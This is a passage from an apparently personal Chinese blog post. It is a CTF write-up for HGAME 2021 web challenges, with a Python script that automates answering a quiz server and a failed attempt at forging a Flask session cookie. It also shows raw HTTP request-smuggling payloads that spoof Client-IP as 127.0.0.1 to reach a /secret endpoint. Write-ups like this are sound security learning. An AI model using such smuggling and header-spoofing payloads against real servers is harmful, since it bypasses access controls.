$.ajax(&#123;</span><br><span class="line">        type: &quot;GET&quot;,</span><br><span class="line">        url: &quot;/api/getFlag&quot;,</span><br><span class="line">        dataType: &quot;json&quot;,</span><br><span class="line">        success:function(data)&#123;</span><br><span class="line">            $(&apos;#flag&apos;).html(data[&apos;flag&apos;]);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function init()&#123;</span><br><span class="line">    getQuestion();</span><br><span class="line">    getStatus();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function submit()&#123;</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">	    type: &quot;POST&quot;,</span><br><span class="line">	    url: &quot;/api/verify&quot;,</span><br><span class="line">	    data: JSON.stringify(&#123;answer:parseFloat($(&apos;#answer&apos;).val())&#125;),</span><br><span class="line">	    dataType: &quot;json&quot;,</span><br><span class="line">	    contentType: &quot;application/json;charset=utf-8&quot;,</span><br><span class="line">	    xhrFields: &#123;</span><br><span class="line">	        withCredentials: true</span><br><span class="line">	    &#125;,</span><br><span class="line">	    crossDomain: true,</span><br><span class="line">	    success: function(data) &#123;</span><br><span class="line">	        console.log(data);</span><br><span class="line">	        if (data[&apos;result&apos;] === true) &#123;</span><br><span class="line">	            init();</span><br><span class="line">	            $(&apos;#alert&apos;).html(`</span><br><span class="line">	                &lt;div class=&quot;alert alert-success&quot;&gt;\n</span><br><span class="line">	                    &lt;strong&gt;Right!&lt;/strong&gt;\n</span><br><span class="line">	                &lt;/div&gt;`)</span><br><span class="line">	        &#125; else &#123;</span><br><span class="line">	            $(&apos;#alert&apos;).html(`</span><br><span class="line">	                &lt;div class=&quot;alert alert-danger&quot;&gt;\n</span><br><span class="line">	                    &lt;strong&gt;Wrong!&lt;/strong&gt;\n</span><br><span class="line">	                &lt;/div&gt;`)</span><br><span class="line">	        &#125;</span><br><span class="line">	    &#125;</span><br><span class="line">	&#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>于是尝试直接去访问一下，就被嘲讽了</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/883f4b830940ccf88ae700056ce465ed.png" alt=""></p>
<p>不过看到cookie上的session值感觉是jwt，于是就尝试解一下</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/86b476179940b8bff1bb393cf44dfd87.png" alt=""></p>
<p>session中保存的做题数量，想着是不是把token篡改就可以了，于是就走上了一条不归路orz</p>
<p>不过整个尝试的过程也算学到了些东西，首先是jwt的原理，之前一直没有去认真看过<br>jwt分为三段，分别是<code>header.payload.signature</code>，都是经过base64编码后去掉尾部<code>=</code>得到的。<code>header</code>中一般存签名的加密方式，<code>payload</code>中存主要的信息，<code>signature</code>就是前面部分经过<code>hmac xxx</code>(加密方式，常用的加密是sha256)得到的数字签名，也就是<code>hmac sha256(header.payload, key)</code>，用于防止伪造<br>一开始我还以为这个<code>key</code>可以得到，猜<code>key</code>可能是<code>pyload</code>的内容，但<code>token</code>中的签名长度只有20位，<code>hmac sha256</code>加密出来的在<code>base64</code>后都是32位，就很懵逼。<code>hmac sha1</code>得到的倒是20位但一直不正确，尝试了各种密码都解不出来</p>
<p>然后看到后台是<code>Werkzeug/1.0.1 Python/3.8.7</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/2a724d75a46b24d9158dabb3edda0722.png" alt=""></p>
<p>搜了一下都是关于<code>flask</code>的，于是查找<code>flask jwt</code>，找到了一篇文章<br><a href="https://www.freebuf.com/articles/network/247503.html" target="_blank" rel="noopener">浅谈flask与ctf那些事</a><br>发现其中的session伪造的密钥还是需要通过SSTI去得到，但这个页面看起来没有SSTI点</p>
<p>于是回到题目</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/48cc8a7444940127c7078fcbd32712cd.png" alt=""></p>
<p>提示了积分全都是<code>ax+b</code>的形式，这时候我才想是不是真的要全部算一下啊？！于是就用脚本跑出来了orz</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import urllib</span><br><span class="line">import re</span><br><span class="line">import json</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">que_url = &quot;http://r4u.top:5000/api/getQuestion&quot;</span><br><span class="line">ver_url = &quot;http://r4u.top:5000/api/verify&quot;</span><br><span class="line">cookie = &#123;&quot;session&quot;:&quot;eyJzb2x2aW5nIjowfQ.YBdmjw.XJwVbgzxQkziZiBmOLz-DaESi5M&quot;&#125;</span><br><span class="line"></span><br><span class="line">for i in range(100):</span><br><span class="line">	http = requests.get(que_url, cookies=cookie)</span><br><span class="line">	num = re.findall(r&quot;&lt;mn&gt;([^&lt;&gt;]+)&lt;/mn&gt;&quot;, http.content.decode())</span><br><span class="line">	sign = re.findall(r&quot;&lt;mo&gt;([^&lt;&gt;]+)&lt;/mo&gt;&quot;, http.content.decode())</span><br><span class="line">	if sign[1] != &apos;(&apos;:</span><br><span class="line">		up = int(num[1])</span><br><span class="line">		down = 0-int(num[0])</span><br><span class="line">	a = int(num[2])</span><br><span class="line">	b = int(num[3])</span><br><span class="line">	answer = ((a/2)*(up*up)+b*up)-((a/2)*(down*down)+b*down)</span><br><span class="line"></span><br><span class="line">	header = &#123;&quot;Content-Type&quot;: &quot;application/json;charset=utf-8&quot;&#125;</span><br><span class="line">	data = json.dumps(&#123;&quot;answer&quot;:answer&#125;)</span><br><span class="line">	print(data)</span><br><span class="line"></span><br><span class="line">	http = requests.post(ver_url, data=data, cookies=cookie, headers=header)</span><br><span class="line">	if &quot;true&quot; not in http.content.decode():</span><br><span class="line">		print(cookie)</span><br><span class="line">		exit()</span><br><span class="line">	cookie = &#123;&quot;session&quot;:http.cookies[&apos;session&apos;]&#125;</span><br><span class="line">	print(cookie)</span><br><span class="line">	time.sleep(1)</span><br><span class="line">print(cookie)</span><br></pre></td></tr></table></figure>
<p>整了我一晚，没想到是道脚本题，人都傻了</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/04d7960b790f935d84eb4ca705bb79f9.png" alt=""></p>
<p>拿最后的<code>token</code>去访问一下得到flag（假装做了100道</p>
<h2 id="走私者的愤怒"><a href="#走私者的愤怒" class="headerlink" title="走私者的愤怒"></a>走私者的愤怒</h2><p>这题是由于之前那题太容易上车了，于是出题人改了一下</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/2ac00d6c8ffd1d16339253de8ce1a972.png" alt=""></p>
<p>可以看到不需要有<code>Client-IP</code>请求字段，服务器会自动携带</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/676dc302976f3db169f4892e474b92de.png" alt=""></p>
<p>试着用之前的方法连续访问，响应了400</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/39dd3943e58e4ccb9385f3346acc5ba7.jpg" alt=""></p>
<p>多试好几次，好像是不允许一个请求中出现两个<code>Host</code>。我们也可以看到，由于是自动添加<code>Client-IP</code>，因此当我们连续访问时，第二条请求就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Client-IP:127.0.0.1</span><br><span class="line">foo:GET / HTTP/1.1</span><br><span class="line">Host: police.liki.link</span><br><span class="line">Content-Length : 47</span><br><span class="line">Client-IP: IP</span><br></pre></td></tr></table></figure>
<p>由于新的会覆盖旧的，因此服务器依旧会获得我们的真实IP</p>
<p>绕开这个IP获取，只需要把第二次的报文直接作为我们的请求体即可，构造一下</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2021_web_wp/df4684c03c05c4d588f819a15effb894.png" alt=""></p>
<p>在连续访问后成功得到flag，因为第二次访问时，我们的请求实际上是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: police.liki.link</span><br><span class="line">Client-IP:127.0.0.1</span><br><span class="line">Content-Length: 200</span><br><span class="line"></span><br><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: police.liki.link</span><br><span class="line">Content-Length : 90</span><br><span class="line">Client-IP:127.0.0.1</span><br><span class="line"></span><br><span class="line">GET /secret HTTP/1.1</span><br><span class="line">Host: police.liki.link</span><br><span class="line">Client-IP:127.0.0.1</span><br><span class="line">Content-Length: 200</span><br></pre></td></tr></table></figure>
<p>第二的发出的报文全都成为了请求体，因此成功伪造<code>Client-IP</code></p>
<p>不过还是觉得就算改了题，照样还是可以上车呀</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/05/De1CTF2020-web-wp/" rel="next" title="De1CTF2020 web 复现">
                <i class="fa fa-chevron-left"></i> De1CTF2020 web 复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="http://shifeng-kaze.cn/blog/head/kotori.jpg" alt="k0t0r1">
            
              <p class="site-author-name" itemprop="name">k0t0r1</p>
              <p class="site-description motion-element" itemprop="description">～いらっしゃいません～</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://shifeng-kaze.cn/" title="shifeng-kaze" target="_blank">shifeng-kaze</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io" title="Aluvion" target="_blank">Aluvion</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Week1"><span class="nav-number">1.</span> <span class="nav-text">Week1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Hitchhiking-in-the-Galaxy"><span class="nav-number">1.1.</span> <span class="nav-text">Hitchhiking_in_the_Galaxy</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#watermelon"><span class="nav-number">1.2.</span> <span class="nav-text">watermelon</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#宝藏走私者"><span class="nav-number">1.3.</span> <span class="nav-text">宝藏走私者</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前端处理CL-Content-Length-而后端不处理"><span class="nav-number">1.3.1.</span> <span class="nav-text">前端处理CL(Content-Length)而后端不处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#同一请求中有两个CL，而前端只处理第一个，后端处理第二个（CL-CL）"><span class="nav-number">1.3.2.</span> <span class="nav-text">同一请求中有两个CL，而前端只处理第一个，后端处理第二个（CL-CL）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#在http请求中存在CL和TE-Transfer-Encoding-，前端只处理的是CL，后端只处理TE（CL-TE）"><span class="nav-number">1.3.3.</span> <span class="nav-text">在http请求中存在CL和TE(Transfer-Encoding)，前端只处理的是CL，后端只处理TE（CL-TE）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#前端只处理TE，后端只处理CL（TE-CL）"><span class="nav-number">1.3.4.</span> <span class="nav-text">前端只处理TE，后端只处理CL（TE-CL）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#前后端都处理TE"><span class="nav-number">1.3.5.</span> <span class="nav-text">前后端都处理TE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3192-如果字段名称后面和冒号前面有空格，则返回400"><span class="nav-number">1.3.6.</span> <span class="nav-text">3192 如果字段名称后面和冒号前面有空格，则返回400</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3201-当返回400错误时，关闭连接"><span class="nav-number">1.3.7.</span> <span class="nav-text">3201 当返回400错误时，关闭连接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3231-验证请求中的Content-Length头"><span class="nav-number">1.3.8.</span> <span class="nav-text">3231 验证请求中的Content-Length头</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3251-当缓存命中时，清空请求体"><span class="nav-number">1.3.9.</span> <span class="nav-text">3251 当缓存命中时，清空请求体</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#智商检测鸡"><span class="nav-number">1.4.</span> <span class="nav-text">智商检测鸡</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#走私者的愤怒"><span class="nav-number">1.5.</span> <span class="nav-text">走私者的愤怒</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">k0t0r1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
